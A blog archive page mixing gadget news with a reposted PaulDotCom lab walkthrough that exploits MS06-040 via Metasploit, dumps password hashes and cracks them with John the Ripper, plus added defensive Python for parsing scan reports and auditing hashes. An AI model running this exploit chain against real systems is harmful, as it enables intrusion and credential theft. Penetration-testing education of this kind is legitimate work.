Category Archives: Diary Entry

BeBook e-book reader makes its debut, doesn’t run BeOS

If you can get past the tinge of disappointment in learning that something named the BeBook isn’t actually the BeOS-based laptop you’ve been waiting for all these years, you may be only slightly less disappointed to know that it’s another fairly ordinary and somewhat overpriced e-book reader. Coming in at a hefty €330 (or $510), this one ditches newfangled features like built-in WiFi or EV-DO, choosing instead to focus on basic features like a six-inch E Ink display, 512MB of internal memory, and an SD card slot for expansion. You’ll also get support for all the usual document and image formats, as well as some basic MP3 playback functionality. If that somehow sounds like the e-book reader you’ve been waiting for, you can order one now and get free worldwide shipping.

[Via Gadget Lab]

Vita Audio adds a splash of luxury to R4 iPod / DAB radio

Nothing says sexy like a sleek wood trim, wouldn’t you wholeheartedly agree? Vita Audio obviously does, as its £499.99 ($980) R4 integrated music system just screams lavish. The all-in-one unit packs an iPod dock, slot-loading CD / MP3 / WMA-music disc player, USB port, DAB and FM tuner with RDS, front and rear auxiliary ports, built-in display, alarm clock function and the firm’s detachable RotoDial remote. For those not feeling the rich walnut veneer, there’s also a high-gloss white (surprised?) version available for £50 ($97) more. Sadly, the “coming soon” tidbit leaves us clueless as to how long you actually have left to save up for either of the pricey systems.

[Via ShinyShiny]

Tech Segment: Probe, Exploit, and Crack for Free – Pauldotcom.com

Episode106 – PaulDotCom Security Weekly

On my Linux box (it could be OS X, but I got errors when I ran nessuscmd under OS X; Ron will be emailing me as soon as he listens to the show 🙂) I run nessuscmd and tell it to OS fingerprint with -O, print out a full report with -V, use plugin ID 22194 (MS06-040), scan TCP ports 139 and 445 with -sS -p139,445, disable safe checking with -U, and test host 192.168.10.139.

root@linux-box:~# /opt/nessus/bin/nessuscmd -O -V -i 22194 -v -sS -p139,445 -U 192.168.10.139

It reports:

Host 192.168.10.139 is up
Discovered open port netbios-ssn (139/tcp) on 192.168.10.139
Discovered open port microsoft-ds (445/tcp) on 192.168.10.139
[i] Plugin 11936 reported a result on port general/tcp of 192.168.10.139
[!] Plugin 22194 reported a result on port microsoft-ds (445/tcp) of 192.168.10.139
+ Results found on 192.168.10.139 :
– Host information :
[i] Plugin ID 11936
| Remote operating system : Microsoft Windows XP
| Microsoft Windows XP Service Pack 1
| Confidence Level : 99
| Method : MSRPC
|
|
|
| The remote host is running one of these operating systems :
| Microsoft Windows XP
| Microsoft Windows XP Service Pack 1

– Port netbios-ssn (139/tcp) is open
– Port microsoft-ds (445/tcp) is open
[!] Plugin ID 22194
|
| Synopsis :
|
|
| Arbitrary code can be executed on the remote host due to a flaw
| in the
| ‘server’ service.
|
| Description :
|
|
| The remote host is vulnerable to a buffer overrun in the ‘Server’
| service
| which may allow an attacker to execute arbitrary code on the remote
| host
| with the ‘System’ privileges.
|
| Solution :
|
|
| Microsoft has released a set of patches for Windows 2000, XP and
| 2003 :
|
|
| http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx
|
|
|
| Risk factor :
|
|
| Critical / CVSS Base Score : 10.0
| (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
| CVE : CVE-2006-3439
| BID : 19409
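
Added example (not part of the original segment or of Nessus): a Python parser that turns a nessuscmd text report like the one above into structured findings for patch triage. It assumes, from the output shown, that [!] marks a vulnerability result and [i] an informational one; the function and field names are this example's own.

```python
import re

# Lines copied from the nessuscmd report above (trimmed to the fields parsed here).
SAMPLE_REPORT = """\
[i] Plugin 11936 reported a result on port general/tcp of 192.168.10.139
[!] Plugin 22194 reported a result on port microsoft-ds (445/tcp) of 192.168.10.139
[i] Plugin ID 11936
| Remote operating system : Microsoft Windows XP
| Confidence Level : 99
[!] Plugin ID 22194
| Critical / CVSS Base Score : 10.0
| (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
| CVE : CVE-2006-3439
| BID : 19409
"""

HIT = re.compile(r"^\[([i!])\] Plugin (\d+) reported a result on port (.+) of (\S+)$")
HEAD = re.compile(r"^\[([i!])\] Plugin ID (\d+)$")
CVSS = re.compile(r"CVSS Base Score : (\d+(?:\.\d+)?)")
CVE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_report(text):
    """Return {plugin_id: finding} built from the summary and detail lines."""
    findings, current = {}, None
    for line in (raw.strip() for raw in text.splitlines()):
        hit, head = HIT.match(line), HEAD.match(line)
        if hit or head:
            flag, pid = (hit or head).group(1, 2)
            entry = findings.setdefault(pid, {"plugin": int(pid), "flagged": False,
                                              "host": None, "port": None,
                                              "cvss": None, "cves": []})
            entry["flagged"] = entry["flagged"] or flag == "!"
            if hit:
                entry["port"], entry["host"] = hit.group(3, 4)
            current = entry if head else None
        elif line.startswith("|") and current is not None:
            score = CVSS.search(line)
            if score:
                current["cvss"] = float(score.group(1))
            current["cves"] += [c for c in CVE.findall(line) if c not in current["cves"]]
        else:
            current = None  # any other line ends the current plugin block
    return findings


def to_remediate(findings, min_cvss=7.0):
    """Flagged results at or above min_cvss, highest score first."""
    hits = [f for f in findings.values()
            if f["flagged"] and f["cvss"] is not None and f["cvss"] >= min_cvss]
    return sorted(hits, key=lambda f: f["cvss"], reverse=True)
```

Feeding each host's saved report through parse_report and to_remediate gives a patch queue keyed by host, port and CVE instead of a wall of text.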

Sweet, I love vulnerabilities! They are sexy and exciting, especially MS06-040, because it's just so delicious and begging to be devoured by metasploit. I have metasploit 3.1 installed in OS X:

/framework-3.1/trunk gordon$ ./msfconsole

       =[ msf v3.2-release
+ -- --=[ 286 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 62 aux

I want to tell metasploit to use the following module:

msf > use windows/smb/ms06_040_netapi

I want to set my payload to a standard meterpreter bind shell, which will let me inject into processes dynamically:

msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

I then tell metasploit what to target:

msf exploit(ms06_040_netapi) > set RHOST 192.168.10.139

Here is what my options look like:

msf exploit(ms06_040_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.10.139   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options:

   Name      Current Setting                                                Required  Description
   ----      ---------------                                                --------  -----------
   DLL       /Users/gordon/framework-3.1/trunk/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
   EXITFUNC  thread                                                         yes       Exit technique: seh, thread, process
   LPORT     4444                                                           yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

Now I tell metasploit to execute my exploit with the above options:

msf exploit(ms06_040_netapi) > exploit

[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Building the stub data…
[*] Calling the vulnerable function…
[*] Transmitting intermediate stager for over-sized stage…(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (81931 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.10.50:52375 -> 192.168.10.139:4444)

To access session 1 I use the following command:

msf exploit(ms06_040_netapi) > sessions -i 1

I then tell meterpreter to load the Sam Juicer module:

meterpreter > use -m Sam

Then I issue the “hashdump” command:

meterpreter > hashdump
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::

So then I copy and paste those results into my other directory with John the Ripper installed:

paimei:~/downloads/john-1.7.0.2/run gordon$ cat > hashes.txt
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::

Then I crack the passwords using the stock dictionary that comes with John:

paimei:~/downloads/john-1.7.0.2/run gordon$ ./john hashes.txt
Loaded 9 password hashes with no different salts (NT LM DES [64/64 BS MMX])
TEAMTED (TeamTed)
(SUPPORT_388945a0)
(Noone)
(Guest)
COM (Administrator:2)
guesses: 5 time: 0:00:00:02 (3) c/s: 11060K trying: TOUSCEL – TOUSMIR
Session aborted

W00t! Now I have remote SYSTEM access to the target, and a username and password to try on other systems in less than 5 minutes. Sweet! I also have something that can be easily scripted and automated for testing my internal network, verifying vulnerabilities, all for free!
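
Added example (not from the original segment): a Python audit of pwdump-style rows such as the hashdump output above, flagging the two storage weaknesses visible in it, blank passwords and stored LM hashes. Function and finding names are this example's own; the two constants are the well-known LM hash of an empty 7-character half and the NT hash of the empty password.

```python
import re

# Well-known constants: the LM hash of an empty 7-character half, and the
# NT hash of the empty password.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Rows copied from the hashdump output above (one redacted, three complete).
SAMPLE_DUMP = """\
Administrator:500:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::
"""


def audit_row(row):
    """Classify one user:rid:lm:nt::: row; returns (user, [findings])."""
    fields = row.strip().split(":")
    if len(fields) < 4:
        return None
    user, _rid, lm, nt = fields[0], fields[1], fields[2].lower(), fields[3].lower()
    if not (HEX32.match(lm) and HEX32.match(nt)):
        return user, ["unreadable-hash-fields"]
    findings = []
    if nt == EMPTY_NT:
        findings.append("blank-password")
    if lm != EMPTY_LM_HALF * 2:
        # A real LM hash is present: it is case-insensitive and splits into
        # two 7-character halves that are hashed independently.
        findings.append("lm-hash-stored")
        if lm[16:] == EMPTY_LM_HALF:
            findings.append("password-7-chars-or-fewer")
    return user, findings


def audit_dump(text):
    """Return {user: findings} for every parsable row in a dump."""
    results = (audit_row(r) for r in text.splitlines() if r.strip())
    return dict(r for r in results if r is not None)
```

The TeamTed row is the one John recovers in seconds: an LM hash is stored and its second half is the empty-half constant. The Windows policy "Network security: Do not store LAN Manager hash value on next password change" stops new LM hashes from being written.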

Microsoft device helps police pluck evidence from cyberscene

Microsoft has developed a small plug-in device that investigators can use to quickly extract forensic data from computers that may have been used in crimes.

“This is cool but also sucks”

The COFEE, which stands for Computer Online Forensic Evidence Extractor, is a USB “thumb drive” that was quietly distributed to a handful of law-enforcement agencies last June.